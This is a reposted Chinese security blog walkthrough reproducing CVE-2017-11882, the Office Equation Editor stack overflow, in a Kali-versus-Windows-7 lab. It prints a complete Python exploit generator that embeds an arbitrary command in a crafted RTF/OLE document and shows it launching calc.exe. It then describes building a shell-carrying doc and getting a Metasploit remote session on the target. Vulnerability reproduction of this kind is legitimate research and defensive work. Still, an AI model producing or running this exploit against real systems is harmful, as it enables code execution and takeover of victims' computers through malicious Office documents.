CVE-2017-11882 Office内存损坏栈溢出漏洞复现

admin 2023年5月17日23:10:53评论37 views字数 10713阅读35分42秒阅读模式

前言

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

如果文章中的漏洞出现敏感内容产生了部分影响,请及时联系作者,望谅解。

一、漏洞原理

漏洞简述

Microsoft Office 2010,是微软推出的新一代办公软件,开发代号为Office 14,实际是第12个发行版。该软件共有6个版本,分别是初级版、家庭及学生版、家庭及商业版、标准版、专业版和专业高级版,此外还推出Office 2010免费版本,其中仅包括Word和Excel应用。除了完整版以外,微软还将发布针对Office 2007的升级版Office 2010。Office 2010可支持32位和64位vista及Windows7,仅支持32位Windows XP,不支持64位XP。

该漏洞允许攻击者在当前用户的上下文中运行任意代码,方法是未能正确处理内存中的对象。

该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出,属于典型的栈溢出漏洞。

漏洞影响范围

供应商:Microsoft

产品:Microsoft Office

确认受影响版本:Microsoft Office 2007 Service Pack 3、Microsoft Office 2010 Service Pack 2、Microsoft Office 2013 Service Pack 1 和 Microsoft Office 2016

二、漏洞复现实战

环境搭建

攻击机: kali linux x64

靶机:windows 7        

Office版本:Office 2010

漏洞复现

在office中编辑公式编辑器时,公式编辑器作为单独的进程,不受WINWORD.EXE, EXCEL.EXE等进程保护机制保护。

公式编辑器Equation.exe

CVE-2017-11882 Office内存损坏栈溢出漏洞复现

打开公式编辑器后,在任务管理器可以看到存在EQNEDT32.EXE进程

CVE-2017-11882 Office内存损坏栈溢出漏洞复现

之后根据POC进行复现,利用Command_CVE-2017-11882.py生成漏洞文件。

POC

import argparse
import sys


RTF_HEADER = R"""{rtf1ansiansicpg1252deff0nouicompatdeflang1033{fonttbl{f0fnilfcharset0 Calibri;}}
{*generator Riched20 6.3.9600}viewkind4uc1
pardsa200sl276slmult1f0fs22lang9"""


RTF_TRAILER = R"""par}
"""


OBJECT_HEADER = R"""{objectobjembobjupdate{*objclass Equation.3}objw380objh260{*objdata """


OBJECT_TRAILER = R"""
}{result{pict{*picprop}wmetafile8picw380pich260picwgoal380pichgoal260
0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
00000000
}}}
"""


OBJDATA_TEMPLATE = R"""
01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
0000000000000000000000000000000000000000000000000000001400000000000000010043006f
006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
00000000000000000000000000000000000000000000000000000000000000010000006600000000
00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
00000000000000000000000000000000000000000000000000000000000000000000000000030004
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
414141414141414141414141414141414141414141120c4300000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000004500710075
006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
0000000000000000000000000000000000000000000000000000000000000004000000c500000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000ff
ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
7cef1800040000002d01010004000000f0010000030000000000
"""


COMMAND_OFFSET = 0x949*2


def create_ole_exec_primitive(command):
   if len(command) > 43:
       print "[!] Primitive command must be shorter than 43 bytes"
       sys.exit(0)
   hex_command = command.encode("hex")
   objdata_hex_stream = OBJDATA_TEMPLATE.translate(None, "rn")
   ole_data = objdata_hex_stream[:COMMAND_OFFSET] + hex_command + objdata_hex_stream[COMMAND_OFFSET + len(hex_command):]
   return OBJECT_HEADER + ole_data + OBJECT_TRAILER



def create_rtf(header,command,trailer):
   ole1 = create_ole_exec_primitive(command + " &")
   
   # We need 2 or more commands for executing remote file from WebDAV
   # because WebClient service start may take some time
   return header + ole1 + trailer



if __name__ == '__main__':
   parser = argparse.ArgumentParser(description="PoC for CVE-2017-11882")
   parser.add_argument("-c", "--command", help="Command to execute.", required=True)
   parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)

   args = parser.parse_args()

   rtf_content = create_rtf(RTF_HEADER, args.command ,RTF_TRAILER)
   
   output_file = open(args.output, "w")
   output_file.write(rtf_content)

   print "[*] Done ! output file >> " + args.output  +" <<"

在kali终端输入下列命令执行POC

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

在终端可以看到文件已成功生成

CVE-2017-11882 Office内存损坏栈溢出漏洞复现

在桌面可以找到已生成的doc文件test.doc

CVE-2017-11882 Office内存损坏栈溢出漏洞复现

在靶机上用Office 2010 打开test.doc,模拟受害者被攻击的情景可以看到文档打开过程中弹出计算器程序calc.exe

CVE-2017-11882 Office内存损坏栈溢出漏洞复现

至此成功完成漏洞验证

将Ruby脚本PS_shell.rb放入MSF框架相关文件夹中,使用ls命令在终端查询该文件,可见该rb文件存在。

CVE-2017-11882 Office内存损坏栈溢出漏洞复现

打开Metasploit framework,输入命令打开PS_shell.rb脚本,配置参数。参数包括相关路径,接收IP,URI Path

CVE-2017-11882 Office内存损坏栈溢出漏洞复现

此时,需要利用POC,生成一个含Shell的doc文件。

CVE-2017-11882 Office内存损坏栈溢出漏洞复现

在靶机中打开attack.doc, kali中MSF成功连接Session

CVE-2017-11882 Office内存损坏栈溢出漏洞复现

之后获取shell,使用命令whoami进行利用

CVE-2017-11882 Office内存损坏栈溢出漏洞复现

漏洞修复

2017.11.28 微软官方为彻底修复漏洞,Microsoft Office 2007推送了安全更新4011604,Microsoft Office 2010推送了安全更新4011618。

结束语

本文主要介绍了CVE-2017-11882 Office内存损坏栈溢出漏洞的原理分析及复现过程,该漏洞允许攻击者在当前用户的上下文中运行任意代码,方法是未能正确处理内存中的对象。


原文始发于微信公众号(0x6270安全团队):CVE-2017-11882 Office内存损坏栈溢出漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月17日23:10:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2017-11882 Office内存损坏栈溢出漏洞复现http://cn-sec.com/archives/1741383.html

发表评论

匿名网友 填写信息